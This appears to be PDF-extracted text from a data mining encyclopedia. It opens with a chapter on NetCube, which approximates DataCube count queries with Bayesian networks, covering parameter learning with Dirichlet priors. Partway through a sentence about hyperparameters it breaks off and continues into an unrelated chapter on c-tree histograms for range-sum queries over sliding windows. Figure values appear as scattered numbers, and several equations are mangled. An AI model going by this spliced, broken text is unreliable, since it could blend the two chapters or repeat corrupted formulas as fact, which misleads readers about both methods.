First, the model should be a reasonably accurate description of our database, or at the very least of the quantities derived from them that are of interest. In this problem these quantities are the results of every interesting count query that can be applied to it (e.g., queries with some minimum support such as 10,000 records or 1%). Second, the model should be simple enough so that using it instead of the actual data to answer a query should not take an exorbitant amount of time (e.g., more than using the actual database to answer the query) or consume an enormous amount of space (e.g., more space than the actual database uses).
These two issues—accuracy vs. time/space complexity—are conflicting, and the problem of balancing them is a central issue in the AI subfield of machine learning, which concerns itself, among other topics, with the development of models of data. This is because it is always possible to describe the data (or the derived quantities we are interested in) better, or at least as well, with increasingly complex models. However, the cost of such models increases with complexity, in terms of both size (to store the model structure and parameters) and time that it takes to use it
NetCube
(for computing the relevant quantities, that is, the query counts in our case). The reason we use Bayesian networks here is their good performance in estimating probability distributions in practice and their sound mathematical foundations in probability theory, compared to a multitude of other ad hoc approaches that exist in the literature. In this chapter we first describe a conceptual solution to the problem, we then show how this solution, even though it is difficult to implement exactly, can be done so approximately using NetCube, which uses Bayesian networks. Next we describe methods for producing Bayesian networks from a database and using them to answer database queries, followed by implementation details. Finally we conclude with experimental results for two case studies where NetCube is used.
for unusual patterns in the data might hypothesize a relationship and attempt to confirm or refute it by issuing a variety of aggregation queries (e.g., counts or averages for combinations of values for different subsets of attributes) possibly changing the set of attributes; for example, adding or deleting attributes from it. If the current hypothesis is refuted, he or she might move to a completely different subset of attributes to start examining a different hypothesis. A summary of this interactive data mining procedure, as given by Gray, Bosworth, Layman, and Pirahesh (1996), divides it into four distinct steps: 1.
Formulate a query that extracts data from the database. Execute the query, extracting aggregated data from the database into a file or relation. Visualize the results in a graphical way. Analyze the results and formulate a new query (go to step 1).
2. 3. 4.
DATACUBES: PRECOMPUTING ALL POSSIBLE AGGREGATE QUERIES
To facilitate the quick retrieval of the aggregated data, Gray et al. (1996) introduced the idea of the DataCube. A DataCube is a conceptual
As described above, a typical data mining scenario involving a human requires real-time interaction with the database. In particular, the analyst looking
Figure 1. An example count DataCube for a domain of 3 binary attributes A, B, and C, containing 23 = 8 tables. The notation A corresponds to the assignment (A = 1) and Ā to (A = 0). AB
1000
35
AB
400
AB
165
A
435
A
565
AC B
800
AC
B
200
AC AC
C
250
C
750
400
AB
AB C
40
AB C
360
60
AB C
20
375
AB C
15
190
AB C
160
375
AB C
240
BC
200
BC
600
BC
50
BC
150
AB C
30
AB C
135
2013
NetCube
device that contains all possible aggregates over all possible subsets of attributes of a domain of interest. For example, for a hypothetical database containing 1,000 records and 3 attributes A, B, C, each taking values 0 or 1, the count DataCube is shown in Figure 1. There are 23 = 8 possible subsets of these 3 attributes (from the empty set to the entire set {A, B, C}). For each of these subsets, a table is stored in the DataCube containing the counts for every possible combination of values for the attributes in the subset, for example, for {A, B} there are 4 entries in the corresponding table, namely count(A = 1, B = 1) = 400, count(A = 1, B = 0) = 35, count(A = 0, B = 1) = 400, and count(A = 0, B = 0) = 165. We will restrict our attention to count DataCubes here, and refer to them simply as “DataCubes” from now on. However, other types of DataCubes exist that correspond to other aggregates, for example, average, max, min, or median DataCubes. Note that some of these can be computed from count DataCubes (e.g., average DataCubes). We can see that, using the DataCube of a database, computation of any query takes constant time (for a table-lookup implementation). In practice however, computation and storage of the DataCube is exceedingly difficult because of its inherently exponential nature. To solve this problem, several approaches have been proposed. Harinarayan, Rajaraman, and Ullman (1996) suggest materializing only a subset of tables and propose a principled way of selecting which ones to prefer. Their system computes the query from those tables at run time. DataCubes containing only cells of some minimum support are suggested by Beyer and Ramakrishnan (1999), who propose coarse-to-fine traversal that improves speed by condensing cells of less than the minimum support. Histogram-based approaches also exist (Ioannidis & Poosala, 1999), as well as approximations such as histogram compression using the DCT transform (Lee, Kim, & Chung, 1999) or wavelets (Vitter & Wang, 1999). Perhaps closest to the methods described in this chapter
2014
is Barbará (1998), which uses linear regression to model DataCubes. Bitmaps are another relatively recent method for efficiently computing counts from highly compressed bitmapped information about the properties of records in the database. Bitmaps are exact techniques that do not maintain counts, but instead store, for every record in the database, one bit for every attribute and value combination. To answer an aggregate query, they perform a pass over several bitmaps at runtime (Chan & Ioannidis, 1999; Johnson, 1999). Even though query optimizers for bitmaps exist (Wu, 1999), the runtime is still linear in the size of the database. In the next section, we describe the relation that exists between the DataCube of a database and a Bayesian network. Following this, we present methods for constructing BNs from data and using them to implement a DataCube approximately.
RELATION BETWEEN BAYESIAN NETWORKS AND DATACUBES In this section, we highlight the aspects of Bayesian networks that relate to our implementation of approximate DataCubes for count queries. We illustrate the relation of DataCubes to BNs using the DataCube of Figure 1, shown again here for convenience in Figure 2(a). This DataCube, possibly taken from the research department of a company that manufactures burglar alarms, is constructed from a database that contains 1,000 records and three Boolean attributes A (“home alarm goes off”), B (“burglar enters the house”) and C (“earthquake occurs”). Although we will assume that all attributes are binary, this is not necessary and does not affect the generality of our methods. In Figure 2(b) we can see the corresponding Bayesian network for this domain. The structure of the BN encodes independencies that hold in the domain, for example, the fact that the edge between B and C in the BN is missing indicates that although A may depend on B and A
NetCube
Figure 2. (a) Example DataCube from Figure 1 constructed from a database of 1,000 records containing attributes A, B, and C. (b) Bayesian network generated from the same database. The Bayesian network can describe exactly the same counts as the DataCube but consumes less space in this example because B and C are independent (unconditionally).
1000
A
435
A
565
AB
400
AB
35
AB
400
AB
165
AC
60
P ( B ) 0.8 AB C
40
AB C
360
AB C
20
burglar
earthquake
B
C A
alarm
B
800
AC
375
AB C
15
B
200
AC
190
AB C
160
AC
375
AB C
240
P (A | B C )
0.2
AB C
30
P (A | B C )
0.6
AB C
135
P (A | B C )
0.4
P (A | B C )
0.1
C
250
C
750
BC
200
BC
600
BC
50
BC
150
(a)
may depend on C, B and C are (unconditionally) independent. The main idea in this section is that the BN can be used to answer any count query that can be posed on the original database. For example, count(A = 1, B = 1, C = 0) = 360, as stored in the DataCube; the same answer can be obtained using the BN as follows: Pr(A = 1, B = 1, C = 0) = Pr ( A = 1 | B = 1, C = 0) Pr (B = 1, C = 0) = Pr (A = 1 | B = 1, C = 0) Pr (B = 1) Pr (C = 0) = 0.6 · 0.8 · 0.75 = 0.36. The estimated count can be calculated by multiplying with the size of the database, that is, count(A = 1, B = 1, C = 0) = 0.36 · 1000 = 360. In this case, answering the query was relatively easy because it was a saturated one. A query is called saturated if it involves all attributes in the database. An unsaturated query may be more difficult to answer using the BN. An example of an
P ( C ) 0.25
(b)
unsaturated query is count(A = 0, B = 1). Using the BN we can answer it as follows: Pr( A = 0, B = 1) = Pr (A = 0, B = 1, C = 0) + Pr (A = 0, B =1, C = 1) = Pr (A = 0 | B = 1, C = 0) Pr (B = 1) Pr (C = 0) + Pr (A = 0 | B = 1, C = 1) Pr (B = 1) Pr (C = 1) = 0.4 · 0.8 · 0.75 + 0.8 · 0.8 · 0.25 = 0.4 which gives count(A = 0, B = 1) = 0.4 · 1,000 = 400, coinciding with the value in the DataCube. As is well known, a BN represents the joint probability distribution function (PDF) of a domain. In general, a probability distribution can be specified with a set of numbers whose size is exponential in the number of attributes in the domain, namely the entries in the joint PDF table. One can represent such a table by a completely connected BN without any great benefit. However, when independencies exist in the domain, using
2015
NetCube
a BN instead of the full joint probability table results in at least two major benefits: 1. Storage savings: These may be significant to the point where infeasibly large domains may be representable, provided that they exhibit a sufficient number of independencies among the variables of the domain. 2. Clear and intuitive representation of independencies: Given the graphical representation of a BN, it is easy to determine the variables on which a quantity of interest depends on statistically (under assumptions) and which are irrelevant and under what conditions. Edge omissions indicate the existence of conditional independencies among variables in the domain. As mentioned above, if all variables in the domain are statistically dependent on all others, then there is no storage advantage to using a BN, because the storage required for the specification of the network is exponential in the number of attributes. Fortunately, in practice this is not the norm, and in fact the most interesting domains for data mining are those that exhibit a considerable number of independencies. The storage space savings in this domain are illustrated in Figure 2(b). The numbers that have to be stored in the DataCube are 20 essential counts. The numbers necessary in the corresponding BN are 6 probability entries. We see that for this particular example this is certainly not a significant improvement, especially considering the overhead of specifying the parents of each node and using floating point numbers for the probability entries. However, for large networks with tens or hundreds of variables, the savings increases exponentially if the corresponding network is sparse. For n attributes, the DataCube has to store 2n tables of counts, with each table having size equal to the product of the cardinalities of the attributes they include (minus one). No full joint table for hundreds of variables containing either
2016
probabilities or counts could ever be stored using today’s technology. However, such a domain may be succinctly represented by a Bayesian network instead if a sufficient number of conditional independencies exist. An interesting application of Bayesian networks that highlights the fact that they can be used to estimate counts is the approach by Getoor, Taskar, and Koller (2001). Getoor et al. (2001) uses a relational extension of Bayesian networks, called probabilistic relational models, to estimate the size of “select” or “select-join” database queries (returning the number of matching records) in cases where data is stored in more than one relations of a database. Their approach is useful for finding the optimal query execution plan before a query is executed, which is an important and difficult problem in database query processing.
LEARNING BAYESIAN NETWORKS FROM DATA Our approach, presented in the next section, uses one or more Bayesian networks to represent the database. In this section we describe the prevalent techniques that are used for learning Bayesian networks. We first describe the easier task of computing the parameters of a BN when its structure is known, followed by one possible method for learning the structure in the next section. We first describe the notation and symbols we will use. The database is denoted as D and its size N = |D|. Throughout the chapter, we refer to attributes and variables interchangeably because BN variables correspond to attributes in the database. We assume that set U = {X1, X2, . . . , Xn} contains all n attributes in the domain. A BN is a pair B = 〈E,T〉, where E is the set of edges among the variables in U and T is the set of local conditional probability tables (the BN parameters) for the structure defined by E. We denote sets of variables with bold letters. The parents of Xi in the BN are denoted as Pai, and their j-th value
NetCube
(attribute value configuration) as paij. We assume that variable Xi can take one of ri values and its parents one of qi configurations. We assume that all local probability distribution functions of a BN are members of the multinomial family.
ity that variable Xi takes its k-th value (out of ri possible ones) when its parents Pai in Bayesian network B = 〈E, T〉 take their j-th value paij (out of qi possible ones). The likelihood of a data set D that contains Nijk records in which Xi = xik and Pai = paj is given by the multinomial distribution
Learning the Parameters Pr(data | parameters) = Pr(D | {pijk}) = A BN is essentially a statistical model. Learning the parameters of a statistical model is a wellknown problem in statistics. The parameters of a BN are the probabilities contained in the conditional probability tables representing the local PDF for each variable in the domain. In the BN literature, where Bayesian approaches seem to be dominant, the parameters themselves are assumed to follow a probability distribution. Before any data are observed, a prior distribution Pr(parameters) is assumed over the parameters of the local PDFs (for example, this can be uniform). This prior distribution may have parameters of its own—although usually fewer than the number of parameters it covers—which are called hyperparameters. Given a data set, a posterior distribution Pr(parameters | data) can be calculated according to Bayes’ law: Pr(parameters | data) = Pr(data | parameters ) Pr( parameters) . Pr(data)
The term Pr(data | parameters) is called the data likelihood, or simply likelihood. Informally, the term Pr(data) can be calculated as a sum (or integral) over all possible parameter values, that is,
n
∑
Pr(data | parameters) Pr( parameters).
parameter values
The parameters of a BN are the probabilities stored in the local PDFs. Let Pijk be the probabil-
ri
Pr(D |{ pijk }) = N!∏∏∏ i =1 j =1 k =1
N
pijkijk N ijk!
.
For the prior distribution, it is frequently desirable to choose one from a family that is conjugate prior to the data distribution. A prior is called conjugate when its posterior belongs to the same family as the prior (albeit possibly with different hyperparameters). The conjugate prior family for multinomial data distribution is the Dirichlet; we present only this case in some detail here. For other cases, such as linear regression with Gaussian noise, see Buntine (1993) and Heckerman and Geiger (1995), or for more complicated ones representable by artificial neural networks, see Monti and Cooper (1998). Also, for more details on conjugate priors, see Casella and Berger (1990). In a BN, we have a number of Dirichlet priors, one for each variable Xi and value paij of its parents Pai in the network. The Dirichlet distribution over the parameters pij1, pij2, . . . , pijr is i expressed by: Pr(pij1, pij2, . . . , pijr | E) = Dir (αij1, αij2, . . . , αijr ) = Γ(
ri
pijkijk
∏ Γ(
ij )
k =1
Pr(data) =
qi
−1
i
i
ijk )
where αijk are its hyperparameters, , and Γ(·) is the Gamma function.1 Assuming local and global parameter independence (Cooper & Herskovits, 1992; Heckerman, Geiger, & Chickering, 1995; Spiegelhalter & Lauritzen, 1990), the prior distribution over the entire set of parameters p = {pijk} of the BN is the product over all priors:
2017
NetCube
Conditionally, on the data set D, the posterior probability over the parameters is also a member of the Dirichlet family, because it is conjugate prior to the multinomial. It is given by: Pr(pij1, pij2, . . . , pijr | E, D) = Dir(Nij1 + αij1, Nij2 + i αij2, . . . , Nijr + αijr ). i
i
is used instead of . This happens, for example, in score-based methods, where the BIC score is employed, which is itself a large-sample approximation of the posterior and is already assuming that the effects of a prior are negligible.
Learning the Structure: Score-Based Methods
The posterior over all parameters is then: Pr(p | E , D) =
n
qi
∏∏ Γ( Nij + i =1 j =1
N +
ri
pijkijk
ijk
∏ Γ( Nijk +
ij )
k =1
−1 ijk )
(1) where is the number of records in D for which Pai = paij . Using this distribution to calculate the (posterior) expected value of an arbitrary quantity Q(p), one averages over all possible values of the (unknown) parameters, weighted by the posterior probability of each value: E[Q (p) | E, D] = ∫Q(X1, X2, . . . , Xn) Pr(p | E, D) dp. This general formula can be used to calculate the parameter values stored in the conditional probability tables of the BN, which are pijk = E[ pijk | E , D ], that is:
pijk = E[ pijk | E , D ] =
∫p
ijk
Pr(p | E , D )dp =
ijk
+ N ijk
ij
+ N ij
.
(2)
Due to the form above, the hyperparameters αijk can be thought of as a number of “virtual samples” that are added to the real samples Nijk for each variable-parent value combination. Popular choices for the hyperparameters are αijk = 1 (a uniform prior over the parameters of each Xi for each parent value combination), and αijk = 1/ri. Frequently, for convenience, especially in cases where data are abundant (i.e., when αijk 0. The histogram is built on top of the sliding window, by hierarchically summarizing the values occurring in it. In order to describe the c-tree we chose a constructive fashion. In particular we define the initial configuration (at the time instant 0 - coinciding with the origin of the data flow) and we show, at a generic instant t coinciding with the arrival of a new data, how the c-tree is updated. Initial Configuration. The c-tree histogram consists of: 1.
2.
MAIN FOCUS OF THE CHAPTER The core of our proposal consists in a tree-like histogram, called c-tree, which is used to manage
2040
3.
A full binary tree T with n levels, where n is a parameter set according to the required data reduction (this issue will be discussed next in Section Experiments). Each leaf node N of T is associated with a range 〈l(N), u(N)〉 having size d = w/2n-1 and the set of such ranges produces an equi-width partition of the array 〈1, w〉. In addition, we require that adjacent leaves correspond to adjacent ranges of 〈1, w〉 and that the left-most leaf corresponds to the range 〈1, d 〉. We denote by val(N) the value of a given node N. At the initial state, all nodes of T contains the value 0. A buffer which is represented by a tuple B = 〈e, s〉 (0 ≤ e < d, s ≥ 0), where s represents the sum of the e most recent elements of the sliding window. Initially, e = s = 0. An index P (1 ≤ P ≤ 2n-1) identifying a leaf node of T. P is initially set to 1, corresponding to the left-most leaf of T.
Approximate Range Querying over Sliding Windows
We denote by H the above data structure. Next, we describe how H is updated when new data arrive. State Transition. Let xt be the data coming at the instant t > 0. Then, we define e := (e+1) mod d and s := s + xt. Now, in case e ≠ 0 (i.e., if the buffer B is not full), then the updating of H halts. Otherwise (i.e., e = 0), the value s (which summarizes the last d data) has to be stored in T and, then, the buffer has to be emptied. We explain now how the insertion of s in T is implemented. Let δ = s – val(NP), where NP is the leaf of T identified by P. Then, val(NP) := val(NP) + s and δ is also added to all nodes belonging to the path from NP to the root of H. Finally, both e and s of B are reset (i.e., they assume value 0) and P := (P mod 2n-1) + 1 (this way, leaf nodes of the tree are managed as a cyclic array). Observe that the index P corresponds to the leaf node containing the less recent data, and that such data are replaced by new data incoming. It is easy to see that each update operation requires O(log w) time, where w is the size of the sliding window. Now we show an example of 3-level c-tree building and updating. Example 1. Let 〈 35, 51, 40, 118, 132, 21, 15, 16, 18, 29, ... 〉 be the data stream ordered by increasing arrival time and let the sliding window size be 8; moreover, let d = w/2n-1 = 2. Initially, e = 0, s = 0, P = 1 and the value of all nodes in T is 0. The first data coming from the stream is 35, thus e = 1 and s = 35. Since e ≠ 0, no other updating operation has to be done. Then, the data coming from the stream is 51, thus e = 0 and s = 35+51 = 86. Since e = 0, the first leaf node of T is set to the value s, and all nodes belonging to the path between such leaf and the root are increased by δ = 86. Finally, P = 2, and both e and s are reset. In Figure 1(a) the resulting c-tree is showed. Therein (as well as in the other figures of the example), we have omitted buffer values since they are null. Moreover, right-hand child nodes are represented with the color grey. This is because, as we will explain in the next section,
these nodes do not have to be saved since they can be computed from white nodes. For the first 8 data arrivals, updates proceeds as before. In Figure 1(b) and 1(c) we report just the snapshot after 4 and 8 updates, respectively. The index P is now changed assuming the value 1. Now, the data 18 arrives. Thus, e = 1 and s = 18. At the next time instant, e = 0 and s = 47. Since e = 0, δ = 47–86 = –39 is added to the leaf node pointed by P (that is the first leaf) determining its new value 47. Moreover, nodes belonging to the path between such leaf and the root are increased by δ. At this point, P assumes the value 2. The final c-tree is shown in Figure 1(d).
C-Tree Representation In this section we describe how the c-tree histogram is represented. Beside storing just necessary nodes, we use a bit-saving based encoding in order to reduce storing space. As already sketched in Example 1, each right-hand child node can be derived as a difference between the value of the parent node and the value of the sibling node. As a consequence, right-hand child node values have not to be stored. In addition, we encode node values through length-variable representations. In particular: 1.
2.
3. 4.
The root is encoded by 32 bits (we assume that anyway the overall sum of the sliding window data can be represented by 32 bits with no scaling error). The root left-child is represented by k bits (where k is a parameter suitably set — we will discuss about such an issue in Section Experiments). All nodes which belong to the same level are represented by the same number of bits. Nodes belonging to a level, say l, with 2 ≤ l ≤ n–1, are represented by a bit less than nodes belonging to the level l–1.
2041
Approximate Range Querying over Sliding Windows
Figure 1. Representation of both the construction and the update of the 3-level c-tree described in Example 1, after 2, 4, 8, and 10 data incomings, respectively.
Substantially, the approach is based on the assumption that, in the average, the sum of occurrences of a given interval of the frequency vector, is twice than the sum of the occurrences of each half of such an interval. This assumption is chosen as a heuristic criterion for designing c-tree, and this explains the choice of reducing by 1 per tree level the number of bits used for representing node values. Clearly, the sum contained in a given node is represented as a fraction of the sum contained in the parent node. Observe that, in principle, a more spaceefficient representation is possible, allowing a different number of bits for nodes belonging to the same level, depending on the actual value contained into nodes. However, we should deal with the spatial overhead due to these variable encodings. Hence, the reduction of 1 bit per level appears as a reasonable compromise. Our approach is validated by previous results shown in (Buccafurri & Lax, 2003, 2004), concerning histograms on persistent data and in (Buccafurri, Lax, Saccà, Pontieri & Rosaci, 2008) aimed to improve estimation inside histogram buckets.
2042
Remark. We remark that the above bit-saving approach, although it is well suited for our treeindexed histogram, it is not applicable to non-hierarchical (i.e., “flat”) histograms. Indeed, in the latter case, the scaling size used for representing numbers would be related to the overall sliding window sum value, that is, the bucket values would be represented as a fraction of this overall sum, with a considerable increasing of the scaling error. One could argue that also data-distribution-driven histograms, like V-Optimal (Jagadish et al., 1998), whose accuracy has been widely proven in the literature, could be improved by building a tree index on top, and by reducing the storage space by trivially applying our bit-saving approach. However, such indexed histograms, induce a non equi-width partition, and, as a consequence, the reduction of 1 bit per level in the index of our approach would be not well-founded. Now, we discuss the approximation introduced by encoding values into the c-tree. First, observe that the encoding a given node N with a certain number of bits, say i, is done in a standard fashion.
Approximate Range Querying over Sliding Windows
Now, let us denote by P the parent node of N. The value val(N) of the node N will be recovered not exactly, in general. It will be affected by a certain scaling approximation. We denote by evali(N) the encoding of val(N) done with i bits and by val i ( N ) the approximation of val(N) obtained by evali(N). We have that: evali(N) = Round((val(N)/val(P)) i ⋅ (2 − 1)). Clearly, 0 ≤ evali(N) ≤ 2i – 1. Concerning the approximation of val(N), it results:
applied to lower levels, so that the above claim is easily verified. In sum, the maximum absolute scaling error of the c-tree is (R ⋅ w)/(2k + 1); interestingly, we observe that the error is independent of the tree depth n. Concerning the storage space (in bits) required by the c-tree, we have: n−2
(n − 1) + ⎡⎢log( R ⋅ d ) ⎤⎥ + ⎡⎢log(d ) ⎤⎥ + 32 + ∑ (k − h )⋅ 2h h=0
val i ( N ) = ((evali(N)/(2i – 1)) ⋅ val(P).
We define the absolute error due to the i-bit encoding of the node N, having parent node P, as:
(1) where d = w/(2n − 1) and the first three components of the sum take account of P, s and e, respectively, while
εa(val(N), val(P), i) = |val(N) – val i ( N )|.
32 + ∑ (k − h )⋅ 2h
It can be easily verified that: 0 ≤ εa(val(N), val(P), i) ≤ val(P) / (2i − 1). We conclude this section by analyzing both (1) the overall scaling error and (2) the storage space required by the c-tree, once the two input parameters are fixed, that is: n, i.e., the number of levels n and k, i.e., the number of bits uses for encoding the left-hand child of the root. Concerning the scaling error we explain how it is propagated over the path from the root to the leaves of the tree. Indeed, the error for a standalone node is analyzed above. We can determine an upper bound of the worst-case error by considering the sum of the maximum scaling error at each stage. Assume that R is the maximum value appearing in the data stream and w is the sliding window size. According to the considerations above, since at the first level we use k bits for encoding node values, the maximum absolute error at this level is (R ⋅ w)/(2k + 1). Going down to the second level cannot increase the maximum error. Indeed, we double the scale granularity (since coding is reduced by 1 bit) but the maximum allowed value is halved. More precisely, the maximum absolute error at the second level is (R ⋅ w)/2k. Clearly, the same reasoning can be
is the space required for saved nodes of T (recall that only left child nodes are stored). In Section Experiments we will discuss about the setting of the parameters n and k. Next, we give details about range-sum query evaluation under the ctree structure.
n−2 h =0
Evaluation of a Range-Sum Query In this section we describe the algorithm used for evaluating the answer to a range query Q(t1, t2) (0 ≤ t1 < t2 < w), that computes the sum of data arrived between time instants t – t1 and t – t2, respectively, where t denotes the current time instant. For example, if t1 = 0 and t2 = 5 it represents the sum of the 5 most recent data. C-tree allows us to reduce the storage space required for storing data of the sliding windows and, at the same time, to give fast yet approximate answers to range queries. As usual in this context, this approximation is the price we have to pay for having a small data structure to manage and for obtaining fast query answering. We now introduce some definitions that will be used in the algorithm.
2043
Approximate Range Querying over Sliding Windows
Notations: Given a range query Q(t1, t2), with t1 > e: Let η be the set of leaf nodes containing at least one data involved in the range query. Let li = (P – [(ti – e)/ d])/(2n – 1), where i = 1, 2 are the indexes of the two leaf nodes L1 and L2. η consists of all leaf nodes succeeding L2 and preceding L1 (including both L1 and L2) in the ordering obtained by considering leaf nodes as a cyclic array. Given a non leaf node N, let L(N) be the set of leaf nodes of the sub-tree having root N. Given a leaf node N, we define I(N, Q) = (i/d) ⋅ val(N), where i is the number of data stored by N involved in Q. I(N, Q) computes the contribution of a leaf node to a range query (by linear interpolation). Let Q be the estimation of the range query computed by means the c-tree.
1.
2.
3.
4.
First, suppose that t1 > e (recall e is the number of data in the buffer B) in such a way that the range query does not involve data in the buffer B. The algorithm for the range query evaluation is performed by calling the function contribution on the root of the c-tree. The function contribution is shown below: function contribution (N) if (N is a leaf) Q = Q + I(N, Q) endif else for each Nx child of N if (L(Nx) ⊆ η) then Q = Q + val(Nx) endif if (L(Nx) ∩ η ≠ ∅) then Q = Q + contribution(Nx) endif endfor return Q // the function halts endfuntion
2044
The first test checks if N is a leaf node, and in such a case the function, before halting, computes the contribution of N to Q by linear interpolation. In case N is not a leaf node, it is tested if all nodes descending from Nx (denoting a child of N) are involved in the query. If this is the case, their contribution to the range query coincides with the value of Nx. In case not all nodes descending from Nx are involved in the query, but only some of them, their contribution is obtained by recursively calling the function on Nx. The algorithm performs, in the worst case, two descents from the root to two leaves. Thus, asymptotic computational cost of answering a range query is O(log w), where w is the window size. Note that the exact cost is upper bounded by n, where n = [log(w/d)] + 1 is the number of levels of the c-tree and d is the size of leaf nodes. In case t1 < t2 ≤ e, the range query involves only data in the buffer B and Q(t1, t2) = (t2 – t1) (s/e) (recall that s represents the sum of data buffered in B). Finally, in case t1 ≤ e < t2, we have that Q(t1, t2) = Q(t1, e) + Q(e, t2) that can be computed by exploiting the two above cases.
Experiments We start this section by describing the features of the test bed we used for experiments: 1.
2.
Available Storage Space. For experiments conducted we have used 22 four-byte numbers for all techniques. According to (1) (given in Section C-tree Representation), the above constraint has to be taken into account when the two basic parameters n and k of the c-tree are set. We have chosen to fix these parameters to values n = 7 and k = 14 (we will motivate such a choice next in this section). Techniques. We have compared our technique with (the motivations of such a choice are given in the Introduction):
Approximate Range Querying over Sliding Windows
•
3.
4.
V-Optimal (VO) (Jagadish et al., 1998), which produces 11 bucket; for each bucket both upper bound and value are stored. Wavelet (WA) (Matias et al., 1998), • which are constructed using the biorthogonal 2.2 decomposition of the MATLAB 5.3 with 11 four-byte Wavelet coefficients plus another 11 four-byte numbers for storing coefficient positions. Data Streams. We have considered two kind of streams: Synthetic Data Streams. Synthetic • Data Streams have been obtained by randomly generating 10000 data values belonging to the range [0,100]. Real-life Data Streams. Real-life data • have been retrieved from (University of California, 1993). Such data represent the maximum daily air temperature, stored by the station STBARBRA.A, in the County of Santa Barbara from 1994 to 2001. Size of data is 2922 and the range is from 10.6 to 38.3 degree Celsius. Query Set and Error Metrics. In our experiments, we use two different query sets, in order to evaluate the effectiveness of the above mentioned techniques: QS1 consists of all range queries having • size [1, q] (1 ≤ q ≤ w), • QS2 is the set of all range queries having size Round(w/10), where, we recall, w is the size of the sliding window. At each time instant, we have measured the error E(t) produced by techniques on the above query set by using the average of the relative error 1 Q rel ⋅ ∑ ei , Q i =1
5.
where Q is the cardinality of the query set, rel rel and ei is the relative error, i.e., ei = (Si – Si )/Si, where Si and Si are, respectively, the actual answer and the estimated answer of the query i-th of the considered query set. Finally, we have computed the average of the error E(t) over the entire data stream duration. After a suitable initial delay sufficient to fill the sliding window, queries have been applied at each arrival of new data. Sliding Window Size. In our experiments, we use sliding windows of size 64, 128, 256, 512 and 1024, that are dimensions frequently used for experiments in this context (Bulut, 2003; Das, 2003; Guha, 2002).
Now we consider the problem of selecting suitable values for both n and k, that are, we recall, the number of levels of the c-tree and the number of bits used for encoding the left child node of the root (for the successive levels, as already mentioned, we drop 1 bit per level) respectively. Observe that, according to the result about the error given in Section C-tree Representation, setting the parameter k means fixing also the error due to scaling approximation. We have performed a number of experiments on synthetic data in order to test the error dependence on the parameters n and k. Here we refer to the average relative error eirel on query set 1. Figure 2(a) shows that the error decreases as n increases and Figure 2(b) shows that error decreases as k increases until k = 11 and then it remains near constant. Indeed, the error consists of two components: (1) the error due to the interpolation inside the leaves nodes partially involved in the query, and (2) the scaling approximation. For k > 11, the last component is negligible, and the error keeps a quasi-constant trend since the first component depends only on n. Therefore, in order to reduce the error, we should set k to a value as large as possible allowing us to represent leaves with a sufficient number of bits (not to much lower than the threshold heuristically determined above).
2045
Approximate Range Querying over Sliding Windows
Figure 2. Average relative error on query set versus n (representing the number of levels of the c-tree) and k (representing the number of bits used for encoding the left child node of the root).
Figure 3. The average relative error on query set 1 versus the sliding window size, by a comparison of different data reduction techniques.
However, for a fixed compression ratio, this may limit the depth of the tree and, thus, the resolution determined by the leaves. As a consequence, the error arising from linear interpolation done inside leaf nodes increases. In sum, the choice of k plays the role of solving the above trade-off. These criteria are employed in experiments in order to choose the value of n and k, respectively, on the basis of the storage space amount. 2046
Now we present results obtained by experiments. For each data set we have calculated the average relative error on both query set 1 and query set 2. In Figures 3(a) and 3(b) we have reported results obtained on real and synthetic data sets, by varying the sliding window size (we have considered sizes: 64, 128, 256, 512) and by using query set 1.
Approximate Range Querying over Sliding Windows
Figure 4. The average relative error on query set 2 versus the sliding window size, by a comparison of different data reduction techniques.
Figure 5. The average relative error on query set 1 versus the number of levels of the c-tree, evaluated for a window size of 256, 512 and 1024, respectively.
C-tree shows the best accuracy, with significant gaps especially with respect to Wavelet. Note that, in case of sliding window of size 64, c-tree does not produce error since there is no discretization and, furthermore, a leaf node is encoded by 9 bits which are sufficient to represent exactly a single data value.
In Figures 4(a) and 4(b) we have replicated the previous experiments on query set 2. Observe that, in this case, accuracy of techniques becomes worse than on query set 1 since the range query size is very small (indeed, the range query involves only the 10% of sliding window data). Also this comparison shows the superiority of the c-tree over other methods.
2047
Approximate Range Querying over Sliding Windows
In Figures 5(a) and 5(b) we have studied the accuracy of c-tree versus the number of levels, by setting k = 14 and by considering as possible sliding window size: 256, 512 and 1024. Query set 1 has been used for these experiments. Finally, we observe that, thanks to experiments conducted with query set 2 (see Figures 4(a) and 4(b)), we have verified that the behaviour of the c-tree is “macroscopically” independent of the position of the range query in the window. Macroscopically here means that even though some queries can be privileged (for instance those involving only entire buckets), it happens that both the average and the variability of the query answer error is not biased. This basically reflects the equi-width nature of the c-tree histogram.
CONCLUSION In this chapter we have presented a tree-like histogram suitable to both reduce sliding windows and support fast approximate answers to arbitrary range-sum queries on them. Through a large set of experiments, the method is successfully compared with other approaches. The histogram is designed to implement data stream pre-processing in a KDD which exploits arbitrary hierarchical range-sum queries. As a future work, we plan to investigate how our method can be exploited in order to support further kinds of queries useful in the context of data stream mining.
REFERENCES
ing data. In Proceedings of the thirteenth annual ACM-SIAM Symposium on Discrete algorithms, 1-16. Buccafurri, F., & Lax, G. (2004). Fast range query estimation by N-level tree histograms. Data & Knowledge Engineering Journal, 51(2), 257-275. Buccafurri, F., & Lax, G. (2003). Pre-computing approximate hierarchical range queries in a treelike histogram. In Proceedings of the International Conference on Data Warehousing and Knowledge Discovery, 350-359. Buccafurri, F., Lax, G., Saccà, D., Pontieri, L., & Rosaci, D. (2008). Enhancing Histograms by Tree-Like Bucket Indices. The VLDB Journal, The International Journal on Very Large Data Bases. Bulut, A., & Singh, A. K., (2003). SWAT: Hierarchical stream summarization in large networks. In Proceedings of the International Conference on Data Engineering, 303-314. Bulut, A., & Singh, A. K., (2005). A Unified Framework for Monitoring Data Streams in Real Time. In Proceedings of the International Conference on Data Engineering, 44-55. Charikar, M., Chen, K., & Farach-Colton, M. (2002). Finding frequent items in data streams. In Proceedings of the of the 29th International Colloquium on Automata, Languages and Programming, 693-703. Chaudhuri, S., Motwani, R., & Narasayya, V. (1999). On random sampling over joins. In Proceedings of the ACM SIGMOD International Conference on Management of Data, 263-274.
Babcock, B., Babu, S., Datar, M., Motwani, R., & Widom, J. (2002). Models and issues in data stream system. In Proceedings of the ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems, 1-16.
Cohen, E., & Strauss, M. J. (2006). Maintaining time-decaying stream aggregates. Journal of Algorithms, 59(1), 19-36.
Babcock, B., Datar, M., & Motwani, R. (2002). Sampling from a moving window over stream-
Cormode, G., Muthukrishnan, S., & Rozenbaum, I. (2005). Summarizing and mining inverse dis-
2048
Approximate Range Querying over Sliding Windows
